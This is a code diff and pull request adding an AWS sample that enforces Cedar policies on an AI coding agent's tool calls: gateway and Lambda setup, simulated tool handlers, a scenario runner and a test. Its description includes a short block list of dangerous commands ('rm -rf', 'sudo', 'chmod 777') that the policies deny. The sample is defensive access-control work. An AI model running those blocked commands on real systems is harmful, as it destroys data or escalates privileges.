+            "inputSchema": {
+                "type": "object",
+                "properties": {"command": {"type": "string"}},
+                "required": ["command"],
+            },
+        },
+    ],
+    "CodeTarget": [
+        {
+            "name": "python_repl",
+            "description": "Execute Python code in a REPL",
+            "inputSchema": {
+                "type": "object",
+                "properties": {"code": {"type": "string"}},
+                "required": ["code"],
+            },
+        },
+        {
+            "name": "execute_code",
+            "description": "Execute code in a sandbox",
+            "inputSchema": {
+                "type": "object",
+                "properties": {"code": {"type": "string"}, "language": {"type": "string"}},
+                "required": ["code"],
+            },
+        },
+    ],
+    "RetrieveTarget": [
+        {
+            "name": "retrieve",
+            "description": "Retrieve documents from a knowledge base",
+            "inputSchema": {
+                "type": "object",
+                "properties": {"query": {"type": "string"}, "top_k": {"type": "integer"}},
+                "required": ["query"],
+            },
+        },
+    ],
+    "HttpTarget": [
+        {
+            "name": "http_request",
+            "description": "Make an HTTP request",
+            "inputSchema": {
+                "type": "object",
+                "properties": {"url": {"type": "string"}, "method": {"type": "string"}},
+                "required": ["url", "method"],
+            },
+        },
+    ],
+    "ApiTarget": [
+        {
+            "name": "invoke",
+            "description": "Invoke an external API endpoint",
+            "inputSchema": {
+                "type": "object",
+                "properties": {"endpoint": {"type": "string"}, "method": {"type": "string"}},
+                "required": ["endpoint"],
+            },
+        },
+    ],
+}
+
+# Map targets to their Lambda handler source files
+_TARGET_LAMBDA_MAP = {
+    "FileSystemTarget": "utils/file_tool.js",
+    "ShellTarget": "utils/shell_tool.js",
+    "CodeTarget": "utils/restricted_tool.js",
+    "RetrieveTarget": "utils/restricted_tool.js",
+    "HttpTarget": "utils/restricted_tool.js",
+    "ApiTarget": "utils/restricted_tool.js",
+}
+
+# Group targets by Lambda source to avoid creating duplicate functions
+_LAMBDA_NAMES = {
+    "utils/file_tool.js": "coding-agent-file-tool",
+    "utils/shell_tool.js": "coding-agent-shell-tool",
+    "utils/restricted_tool.js": "coding-agent-restricted-tool",
+}
+
+
+def setup_gateway(region: str) -> dict:
+    """Create MCP Gateway with Cognito OAuth and tool targets.
+
+    Returns dict with gateway_client, gateway, client_info, gateway_url, gateway_id,
+    lambda_arns, iam_role_arn.
+    """
+    gateway_client = GatewayClient(region_name=region)
+
+    # Create Cognito OAuth authorizer (we need client_info for tokens later)
+    cognito_result = gateway_client.create_oauth_authorizer_with_cognito(
+        gateway_name="coding-agent-policy-gw"
+    )
+    client_info = cognito_result["client_info"]
+    authorizer_config = cognito_result["authorizer_config"]
+
+    # Get or create gateway with this authorizer
+    gateway = _get_or_create_gateway(gateway_client, region, authorizer_config)
+    gateway_id = gateway["gatewayId"]
+    gateway_url = gateway["gatewayUrl"]
+
+    # Enable CloudWatch Logs for policy decision auditing
+    _enable_log_delivery(gateway_client, gateway, region)
+
+    # Create per-target Lambda functions
+    lambda_client = boto3.client("lambda", region_name=region)
+    iam_client = boto3.client("iam", region_name=region)
+
+    role_arn = _get_or_create_lambda_role(iam_client, region)
+    lambda_arns = _create_lambda_functions(lambda_client, role_arn, region)
+
+    # Register tool targets with per-target Lambdas
+    for target_name, tools in TARGET_TOOLS.items():
+        source_file = _TARGET_LAMBDA_MAP[target_name]
+        lambda_name = _LAMBDA_NAMES[source_file]
+        lambda_arn = lambda_arns[lambda_name]
+        _create_target(gateway_client, gateway, target_name, tools, lambda_arn)
+
+    print(f"  Gateway ready: {gateway_id}")
+    print(f"  URL: {gateway_url}")
+
+    return {
+        "gateway_client": gateway_client,
+        "gateway": gateway,
+        "client_info": client_info,
+        "gateway_url": gateway_url,
+        "gateway_id": gateway_id,
+        "lambda_arns": lambda_arns,
+        "iam_role_arn": role_arn,
+    }
+
+
+def _get_or_create_gateway(
+    gateway_client: GatewayClient, region: str, authorizer_config: dict
+) -> dict:
+    """Get existing gateway or create a new one (idempotent)."""
+    try:
+        result = gateway_client.get_gateway(name="coding-agent-policy-gw")
+        if result and "gateway" in result:
+            gw = result["gateway"]
+            status = gw.get("status", "")
+            if status == "READY":
+                print("  Reusing existing gateway: coding-agent-policy-gw")
+                return gw
+            # Gateway exists but is in bad state — delete and recreate
+            print(f"  Gateway in {status} state, recreating...")
+            try:
+                gateway_client.cleanup_gateway(gateway_id=gw["gatewayId"])
+            except Exception:
+                pass
+    except Exception:
+        pass
+
+    # Create new gateway with the provided authorizer
+    gateway = gateway_client.create_mcp_gateway(
+        name="coding-agent-policy-gw",
+        authorizer_config=authorizer_config,
+        enable_semantic_search=False,
+        enable_observability=False,
+    )
+    return gateway
+
+
+def _enable_log_delivery(gateway_client: GatewayClient, gateway: dict, region: str) -> None:
+    """Enable CloudWatch Logs delivery for policy decision auditing."""
+    gateway_id = gateway["gatewayId"]
+    gateway_arn = gateway.get("gatewayArn")
+
+    try:
+        gateway_client.enable_observability(
+            gateway_id=gateway_id,
+            gateway_arn=gateway_arn,
+            enable_logs=True,
+            enable_traces=False,  # Skip X-Ray (often fails with ValidationException)
+        )
+        print("  ✓ CloudWatch Logs delivery enabled (policy decisions will be logged)")
+    except Exception as e:
+        err_msg = str(e)
+        if "already" in err_msg.lower() or "enabled" in err_msg.lower():
+            print("  ✓ CloudWatch Logs already enabled")
+        else:
+            # Non-blocking — observability failure shouldn't stop the demo
+            print(f"  ⚠ Log delivery setup: {err_msg} (non-blocking)")
+
+
+def _get_or_create_lambda_role(iam_client, region: str) -> str:
+    """Create or reuse the IAM role for Lambda functions."""
+    role_name = "coding-agent-policy-lambda-role"
+    trust_policy = json.dumps(
+        {
+            "Version": "2012-10-17",
+            "Statement": [
+                {
+                    "Effect": "Allow",
+                    "Principal": {"Service": "lambda.amazonaws.com"},
+                    "Action": "sts:AssumeRole",
+                }
+            ],
+        }
+    )
+
+    try:
+        resp = iam_client.get_role(RoleName=role_name)
+        print(f"  Reusing IAM role: {role_name}")
+        return resp["Role"]["Arn"]
+    except iam_client.exceptions.NoSuchEntityException:
+        pass
+
+    print(f"  Creating IAM role: {role_name}")
+    resp = iam_client.create_role(
+        RoleName=role_name,
+        AssumeRolePolicyDocument=trust_policy,
+        Description="Execution role for coding-agent-policy Lambda tools",
+    )
+    role_arn = resp["Role"]["Arn"]
+
+    # Attach basic execution policy
+    iam_client.attach_role_policy(
+        RoleName=role_name,
+        PolicyArn="arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole",
+    )
+
+    # Wait for role propagation
+    print("  Waiting 10s for IAM role propagation...")
+    time.sleep(10)
+    return role_arn
+
+
+def _create_lambda_functions(lambda_client, role_arn: str, region: str) -> dict[str, str]:
+    """Create Lambda functions from utils/ JS files. Returns {name: arn}."""
+    from pathlib import Path
+
+    arns = {}
+    for source_file, func_name in _LAMBDA_NAMES.items():
+        # Check if function already exists
+        try:
+            resp = lambda_client.get_function(FunctionName=func_name)
+            arns[func_name] = resp["Configuration"]["FunctionArn"]
+            print(f"  Reusing Lambda: {func_name}")
+            continue
+        except lambda_client.exceptions.ResourceNotFoundException:
+            pass
+
+        # Read source and create zip in memory
+        source_path = Path(source_file)
+        source_code = source_path.read_text()
+
+        zip_buffer = io.BytesIO()
+        with zipfile.ZipFile(zip_buffer, "w", zipfile.ZIP_DEFLATED) as zf:
+            zf.writestr("index.js", source_code)
+        zip_bytes = zip_buffer.getvalue()
+
+        print(f"  Creating Lambda: {func_name}")
+        for attempt in range(5):
+            try:
+                resp = lambda_client.create_function(
+                    FunctionName=func_name,
+                    Runtime="nodejs20.x",
+                    Role=role_arn,
+                    Handler="index.handler",
+                    Code={"ZipFile": zip_bytes},
+                    Description=f"Tool handler for coding-agent-policy sample ({source_file})",
+                    Timeout=30,
+                    MemorySize=128,
+                )
+                arns[func_name] = resp["FunctionArn"]
+
+                # Wait for function to become active
+                waiter = lambda_client.get_waiter("function_active_v2")
+                waiter.wait(FunctionName=func_name)
+                break
+            except lambda_client.exceptions.InvalidParameterValueException as e:
+                if "role" in str(e).lower() and attempt < 4:
+                    print("    Role not ready, retrying in 5s...")
+                    time.sleep(5)
+                    continue
+                raise
+            except Exception as e:
+                if "ResourceConflictException" in type(e).__name__:
+                    resp = lambda_client.get_function(FunctionName=func_name)
+                    arns[func_name] = resp["Configuration"]["FunctionArn"]
+                    break
+                raise
+
+        # Add resource-based policy so Gateway can invoke
+        account_id = get_account_id(region)
+        try:
+            lambda_client.add_permission(
+                FunctionName=func_name,
+                StatementId="AllowBedrockAgentCoreInvoke",
+                Action="lambda:InvokeFunction",
+                Principal="bedrock-agentcore.amazonaws.com",
+                SourceAccount=account_id,
+            )
+        except lambda_client.exceptions.ResourceConflictException:
+            pass  # Permission already exists
+
+    return arns
+
+
+def _create_target(
+    gateway_client: GatewayClient,
+    gateway: dict,
+    name: str,
+    tools: list[dict],
+    lambda_arn: str,
+) -> None:
+    """Create a gateway target with custom tool schema."""
+    target_payload = {
+        "lambdaArn": lambda_arn,
+        "toolSchema": {"inlinePayload": tools},
+    }
+
+    for attempt in range(3):
+        try:
+            gateway_client.create_mcp_gateway_target(
+                gateway=gateway,
+                name=name,
+                target_type="lambda",
+                target_payload=target_payload,
+            )
+            return
+        except Exception as e:
+            err_msg = str(e)
+            if "ConflictException" in type(e).__name__ or "already exists" in err_msg:
+                return
+            if ("not ready" in err_msg or "resource conflict" in err_msg) and attempt < 2:
+                print(f"    {name}: Lambda not ready, retrying in 10s...")
+                time.sleep(10)
+                continue
+            raise

--- a/02-use-cases/securing-coding-agents/src/policy_engine.py
+++ b/02-use-cases/securing-coding-agents/src/policy_engine.py
@@ -1,0 +1,117 @@
+"""Policy Engine provisioning and Cedar policy deployment."""
+
+from __future__ import annotations
+
+import re
+import time
+from pathlib import Path
+
+import boto3
+
+from .utils import resolve_gateway_arn
+
+_STATEMENT_RE = re.compile(r"^(?:permit|forbid)\s*\(", re.MULTILINE)
+_PROPAGATION_DELAY = 15
+
+
+def setup_policy_engine(
+    region: str,
+    gateway_client,
+    gateway: dict,
+    policies_dir: str,
+    enforcement_mode: str,
+    gateway_id: str,
+) -> dict:
+    """Create Policy Engine, load Cedar policies, attach to Gateway.
+
+    Returns dict with policy_engine_id and policy_engine_arn.
+    """
+    from bedrock_agentcore_starter_toolkit.operations.policy.client import PolicyClient
+
+    policy_client = PolicyClient(region_name=region)
+
+    # Create or get Policy Engine
+    engine = policy_client.create_or_get_policy_engine(
+        name="coding_agent_policy_engine",
+        description="Cedar policies for coding agent tool access control",
+    )
+    pe_id = engine["policyEngineId"]
+
+    # Attach to Gateway
+    gateway_client.update_gateway_policy_engine(
+        gateway_identifier=gateway_id,
+        policy_engine_arn=engine["policyEngineArn"],
+        mode=enforcement_mode,
+    )
+    print(f"  Policy Engine attached (mode: {enforcement_mode})")
+    print(f"  Waiting {_PROPAGATION_DELAY}s for propagation...")
+    time.sleep(_PROPAGATION_DELAY)
+
+    # Load and submit Cedar policies
+    ac_client = boto3.client("bedrock-agentcore-control", region_name=region)
+    gateway_arn = resolve_gateway_arn(region, gateway_id)
+
+    for policy_file in sorted(Path(policies_dir).glob("*.cedar")):
+        cedar_text = policy_file.read_text()
+        cedar_text = cedar_text.replace("<gateway_arn>", gateway_arn)
+
+        statements = _split_statements(cedar_text)
+        for idx, stmt in enumerate(statements):
+            if not stmt.strip():
+                continue
+            name = f"{policy_file.stem}_{idx}" if len(statements) > 1 else policy_file.stem
+            name = name.replace("-", "_")
+            _create_policy(ac_client, pe_id, name, stmt, policy_file.name)
+
+    print(f"  Waiting {_PROPAGATION_DELAY}s for policy propagation...")
+    time.sleep(_PROPAGATION_DELAY)
+
+    return {
+        "policy_engine_id": pe_id,
+        "policy_engine_arn": engine["policyEngineArn"],
+    }
+
+
+def _split_statements(text: str) -> list[str]:
+    """Split a Cedar file into individual statements."""
+    matches = list(_STATEMENT_RE.finditer(text))
+    if len(matches) <= 1:
+        return [text.strip()]
+    statements = []
+    for i, m in enumerate(matches):
+        start = m.start()
+        end = matches[i + 1].start() if i + 1 < len(matches) else len(text)
+        statements.append(text[start:end].strip())
+    return [s for s in statements if s]
+
+
+def _create_policy(ac_client, pe_id: str, name: str, statement: str, source: str) -> None:
+    """Create a single Cedar policy with retry logic."""
+    print(f"  Submitting: {name}")
+    try:
+        resp = ac_client.create_policy(
+            policyEngineId=pe_id,
+            name=name,
+            description=f"From {source}",
+            definition={"cedar": {"statement": statement}},
+            validationMode="IGNORE_ALL_FINDINGS",
+        )
+        policy_id = resp["policyId"]
+
+        # Poll for ACTIVE
+        for _ in range(20):
+            time.sleep(2)
+            status = ac_client.get_policy(policyEngineId=pe_id, policyId=policy_id)
+            if status.get("status") == "ACTIVE":
+                print(f"    ✓ {name} ACTIVE")
+                return
+            if status.get("status") == "CREATE_FAILED":
+                reasons = status.get("statusReasons", [])
+                print(f"    ✗ {name} FAILED: {reasons}")
+                return
+        print(f"    ⚠ {name} timeout")
+    except Exception as e:
+        if "ConflictException" in type(e).__name__:
+            print(f"    ✓ {name} already exists")
+        else:
+            raise

--- a/02-use-cases/securing-coding-agents/src/scenarios.py
+++ b/02-use-cases/securing-coding-agents/src/scenarios.py
@@ -1,0 +1,97 @@
+"""Demo scenario runner for Gateway-level Cedar policy enforcement."""
+
+from __future__ import annotations
+
+from datetime import datetime, timezone
+
+import requests
+
+from .utils import green, red
+
+
+def run_gateway_scenarios(gateway_url: str, bearer_token: str, scenarios: list[dict]) -> list[dict]:
+    """Run all Gateway scenarios and return results."""
+    results = []
+    for s in scenarios:
+        result = _run_one(gateway_url, bearer_token, s)
+        results.append(result)
+
+        decision = result["decision"]
+        name = result["scenario"]
+        tool = result["tool"]
+        reason = result.get("reason", "")
+
+        if decision == "ALLOW":
+            print(f"  {green('ALLOW')} {name}: {tool}")
+        else:
+            print(f"  {red('DENY')}  {name}: {tool}")
+            if reason:
+                print(f"        {reason}")
+
+    return results
+
+
+def _run_one(gateway_url: str, bearer_token: str, scenario: dict) -> dict:
+    """Run a single scenario via JSON-RPC to the Gateway."""
+    tool_name = f"{scenario['target']}___{scenario['tool']}"
+    payload = {
+        "jsonrpc": "2.0",
+        "id": 1,
+        "method": "tools/call",
+        "params": {"name": tool_name, "arguments": scenario.get("input", {})},
+    }
+    headers = {
+        "Content-Type": "application/json",
+        "Authorization": f"Bearer {bearer_token}",
+    }
+
+    try:
+        resp = requests.post(gateway_url, json=payload, headers=headers, timeout=30)
+    except requests.ConnectionError:
+        return {
+            "scenario": scenario["name"],
+            "tool": tool_name,
+            "decision": "FAILED",
+            "expected": scenario["expected"],
+            "reason": "Connection error",
+            "timestamp": datetime.now(timezone.utc).isoformat(),
+        }
+
+    # Always try to parse JSON, regardless of status code
+    resp_json = {}
+    try:
+        resp_json = resp.json()
+    except (ValueError, requests.exceptions.JSONDecodeError):
+        resp_json = {"error": {"message": f"Non-JSON response (HTTP {resp.status_code})"}}
+
+    decision = "ALLOW" if resp.status_code == 200 and "error" not in resp_json else "DENY"
+
+    reason = ""
+    if decision == "DENY" and isinstance(resp_json, dict) and "error" in resp_json:
+        err = resp_json["error"]
+        reason = err.get("message", "") if isinstance(err, dict) else str(err)
+
+    return {
+        "scenario": scenario["name"],
+        "tool": tool_name,
+        "decision": decision,
+        "expected": scenario["expected"],
+        "reason": reason,
+        "timestamp": datetime.now(timezone.utc).isoformat(),
+    }
+
+
+def print_summary(results: list[dict]) -> bool:
+    """Print scenario summary with match/mismatch counts. Returns True if all passed."""
+    matches = sum(1 for r in results if r["decision"] == r["expected"])
+    total = len(results)
+    mismatches = total - matches
+
+    print(f"\n  Results: {matches}/{total} scenarios matched expected decision.")
+    if mismatches:
+        print("  Mismatches:")
+        for r in results:
+            if r["decision"] != r["expected"]:
+                print(f"    {r['scenario']}: expected {r['expected']}, got {r['decision']}")
+
+    return mismatches == 0

--- a/02-use-cases/securing-coding-agents/src/utils.py
+++ b/02-use-cases/securing-coding-agents/src/utils.py
@@ -1,0 +1,65 @@
+"""Shared utilities for the AgentCore Policy sample."""
+
+from __future__ import annotations
+
+import json
+import sys
+from pathlib import Path
+
+import boto3
+import yaml
+
+
+def load_config(config_path: str = "config.yaml") -> dict:
+    """Load configuration from YAML file."""
+    path = Path(config_path)
+    if not path.exists():
+        print(f"Error: config file not found: {config_path}")
+        sys.exit(1)
+    with open(path) as f:
+        return yaml.safe_load(f)
+
+
+def get_account_id(region: str = "us-west-2") -> str:
+    """Get the current AWS account ID via STS."""
+    sts = boto3.client("sts", region_name=region)
+    return sts.get_caller_identity()["Account"]
+
+
+def resolve_gateway_arn(region: str, gateway_id: str) -> str:
+    """Build the full Gateway ARN from region and gateway ID."""
+    account_id = get_account_id(region)
+    return f"arn:aws:bedrock-agentcore:{region}:{account_id}:gateway/{gateway_id}"
+
+
+def save_state(state: dict, path: str = ".state.json") -> None:
+    """Save deployment state to a JSON file."""
+    with open(path, "w") as f:
+        json.dump(state, f, indent=2)
+
+
+def load_state(path: str = ".state.json") -> dict:
+    """Load deployment state from a JSON file."""
+    p = Path(path)
+    if not p.exists():
+        return {}
+    with open(p) as f:
+        return json.load(f)
+
+
+def green(text: str) -> str:
+    if sys.stdout.isatty():
+        return f"\033[32m{text}\033[0m"
+    return text
+
+
+def red(text: str) -> str:
+    if sys.stdout.isatty():
+        return f"\033[31m{text}\033[0m"
+    return text
+
+
+def bold(text: str) -> str:
+    if sys.stdout.isatty():
+        return f"\033[1m{text}\033[0m"
+    return text

--- a/02-use-cases/securing-coding-agents/tests/test_scenarios.py
+++ b/02-use-cases/securing-coding-agents/tests/test_scenarios.py
@@ -1,0 +1,21 @@
+"""Basic tests for the scenario runner."""
+
+from src.scenarios import _run_one
+
+
+def test_scenario_result_structure():
+    """Verify scenario result dict has expected keys."""
+    # This test doesn't hit real AWS — it tests the result structure
+    scenario = {
+        "name": "test-scenario",
+        "target": "TestTarget",
+        "tool": "test_tool",
+        "input": {"key": "value"},
+        "expected": "DENY",
+    }
+    # Will fail with connection error (no real gateway) but structure is valid
+    result = _run_one("http://localhost:9999", "fake-token", scenario)
+    assert "scenario" in result
+    assert "tool" in result
+    assert "decision" in result
+    assert result["decision"] in ("ALLOW", "DENY", "FAILED")

--- a/02-use-cases/securing-coding-agents/utils/file_tool.js
+++ b/02-use-cases/securing-coding-agents/utils/file_tool.js
@@ -1,0 +1,30 @@
+exports.handler = async (event) => {
+    const { name, arguments: args } = JSON.parse(event.body || '{}');
+
+    if (name === 'read_file') {
+        return {
+            statusCode: 200,
+            body: JSON.stringify({
+                content: `// Contents of ${args.path}\nconsole.log("hello world");`
+            })
+        };
+    }
+    if (name === 'write_file') {
+        return {
+            statusCode: 200,
+            body: JSON.stringify({
+                success: true,
+                message: `Written ${args.content.length} bytes to ${args.path}`
+            })
+        };
+    }
+    if (name === 'list_directory') {
+        return {
+            statusCode: 200,
+            body: JSON.stringify({
+                entries: ['index.js', 'app.py', 'test_auth.py', 'README.md']
+            })
+        };
+    }
+    return { statusCode: 400, body: JSON.stringify({ error: `Unknown tool: ${name}` }) };
+};

--- a/02-use-cases/securing-coding-agents/utils/restricted_tool.js
+++ b/02-use-cases/securing-coding-agents/utils/restricted_tool.js
@@ -1,0 +1,9 @@
+exports.handler = async (event) => {
+    const { name, arguments: args } = JSON.parse(event.body || '{}');
+    return {
+        statusCode: 200,
+        body: JSON.stringify({
+            result: `Executed ${name} — this should only be reachable if Cedar policies allow it.`
+        })
+    };
+};

--- a/02-use-cases/securing-coding-agents/utils/shell_tool.js
+++ b/02-use-cases/securing-coding-agents/utils/shell_tool.js
@@ -1,0 +1,15 @@
+exports.handler = async (event) => {
+    const { name, arguments: args } = JSON.parse(event.body || '{}');
+
+    if (name === 'execute') {
+        // Simulate command execution (Cedar blocks dangerous ones before they reach here)
+        return {
+            statusCode: 200,
+            body: JSON.stringify({
+                stdout: `Executed: ${args.command}\n\nAll tests passed.`,
+                exitCode: 0
+            })
+        };
+    }
+    return { statusCode: 400, body: JSON.stringify({ error: `Unknown tool: ${name}` }) };
+};

--- a/CONTRIBUTORS.md
+++ b/CONTRIBUTORS.md
@@ -119,3 +119,5 @@
 - Gui Ruggiero (guiruggiero)
 - Visakh Madathil (vmmadathil)
 - JobRamos (jobdram)
+- Srividya Ponnada (psrivi)
+- Bharathi Srinivasan (bhrsrini)


### PR DESCRIPTION
**Issue number: #1587**

**Concise description of the PR**
Adds 02-use-cases/securing-coding-agents/ — a complete sample demonstrating
Cedar policy enforcement on AI coding agents via AgentCore Gateway and Policy
Engine. Covers path-based file access, command allowlists/blocklists, tool-level
restrictions, and CloudWatch observability.

**User experience**
Before: No sample demonstrates securing coding agents. The existing 02-policy feature tutorial focuses on ABAC with JWT claims for insurance underwriting.

After: Developers building AI coding assistants can deploy this sample and immediately see Cedar policies enforcing:

File access restricted to /workspace/src/* only
Shell commands limited to an explicit allowlist (npm test, npm run build, python -m pytest)
Dangerous commands blocked (rm -rf, sudo, chmod 777)
Restricted tools denied (code execution, HTTP, retrieval, external APIs)
All policy decisions logged to CloudWatch
18 scenarios (8 ALLOW / 10 DENY) validate enforcement end-to-end.

## Checklist

If your change doesn't seem to apply, please leave them unchecked.

* [x] I have reviewed the [contributing guidelines](https://github.com/awslabs/amazon-bedrock-agentcore-samples/blob/main/CONTRIBUTING.md)
* [x] Add your name to [CONTRIBUTORS.md](https://github.com/awslabs/amazon-bedrock-agentcore-samples/blob/main/CONTRIBUTORS.md)
* [x] Have you checked to ensure there aren't other open [Pull Requests](https://github.com/awslabs/amazon-bedrock-agentcore-samples/pulls) for the same update/change?
* [ ] Are you uploading a dataset?
* [x] Have you documented **Introduction**, **Architecture Diagram**, **Prerequisites**, **Usage**, **Sample Prompts**, and **Clean Up** steps in your example README?
* [x] I agree to resolve any [issues](https://github.com/awslabs/amazon-bedrock-agent-samples/issues) created for this example in the future.
* [x] I have performed a self-review of this change
* [x] Changes have been tested
* [x] Changes are documented

## Acknowledgment

By submitting this pull request, I confirm that you can use, modify, copy, and redistribute this contribution, under the terms of the [project license](https://github.com/awslabs/amazon-bedrock-agentcore-samples/blob/main/LICENSE).
